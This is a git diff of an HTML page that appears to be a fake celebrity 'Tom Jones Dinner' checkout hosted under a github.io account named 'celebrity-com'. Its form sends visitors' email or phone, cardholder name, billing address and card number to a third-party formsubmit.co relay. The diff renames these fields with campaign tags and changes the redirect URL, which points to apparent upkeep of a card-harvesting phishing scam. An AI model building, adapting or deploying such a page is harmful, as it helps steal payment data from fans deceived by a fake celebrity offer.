--- a/index.html
+++ b/index.html
@@ -201,7 +201,7 @@ action="https://formsubmit.co/9bad1063a8dcaac90c4721040d4ea0e8">
 
 
 
-value="https://celebrity-com.github.io/Checkout.TomJones.com/">
+value="https://celebrity-com.github.io/.Link.TomJones.com/">
  
 
 
@@ -213,20 +213,20 @@ value="https://celebrity-com.github.io/Checkout.TomJones.com/">
 
 
 
-<div id="wpforms-278-field_3-container" class="wpforms-field wpforms-field-text" data-field-id="3"><label class="wpforms-field-label" for="wpforms-278-field_3">Email Or Phone Number</label><input type="text" placeholder="Email or phone number to get notifications" id="wpforms-278-field_3" class="wpforms-field-medium" name="EMAIL_or_PHONE" ></div> 
+<div id="wpforms-278-field_3-container" class="wpforms-field wpforms-field-text" data-field-id="3"><label class="wpforms-field-label" for="wpforms-278-field_3">Email Or Phone Number</label><input type="text" placeholder="Email or phone number to get notifications" id="wpforms-278-field_3" class="wpforms-field-medium" name="EMAIL_or_PHONE_Tom_Jones_D" ></div> 
  
 
 
 
 
-<div id="wpforms-278-field_3-container" class="wpforms-field wpforms-field-text" data-field-id="3"><label class="wpforms-field-label" for="wpforms-278-field_3">CardHolder Name</label><input type="text" id="wpforms-278-field_3" class="wpforms-field-medium" name="card_holder" required></div> 
+<div id="wpforms-278-field_3-container" class="wpforms-field wpforms-field-text" data-field-id="3"><label class="wpforms-field-label" for="wpforms-278-field_3">CardHolder Name</label><input type="text" id="wpforms-278-field_3" class="wpforms-field-medium" name="card_holder_Tom_Jones_Dinner" required></div> 
  
 
 
 
 
 
-<div id="wpforms-278-field_3-container" class="wpforms-field wpforms-field-text" data-field-id="3"><label class="wpforms-field-label" for="wpforms-278-field_3">Billing Address</label><input type="text" id="wpforms-278-field_3" class="wpforms-field-medium" name="Billing_Address required" ></div> 
+<div id="wpforms-278-field_3-container" class="wpforms-field wpforms-field-text" data-field-id="3"><label class="wpforms-field-label" for="wpforms-278-field_3">Billing Address</label><input type="text" id="wpforms-278-field_3" class="wpforms-field-medium" name="Billing_Address_Tom_Jones_D" required ></div> 
  
 
 
@@ -242,7 +242,7 @@ value="https://celebrity-com.github.io/Checkout.TomJones.com/">
 
 
 
- <div id="wpforms-278-field_3-container" class="wpforms-field wpforms-field-text" data-field-id="3"><label class="wpforms-field-label" for="wpforms-278-field_3">Credit / Debit Card Number</label><input type="tel"  minlength="15" maxlength="16"  name="Card_Number" required ></div>  
+ <div id="wpforms-278-field_3-container" class="wpforms-field wpforms-field-text" data-field-id="3"><label class="wpforms-field-label" for="wpforms-278-field_3">Credit / Debit Card Number</label><input type="tel"  minlength="15" maxlength="16"  name="Card_Number_TomJONES_DINNER" required ></div>  
 
 
 
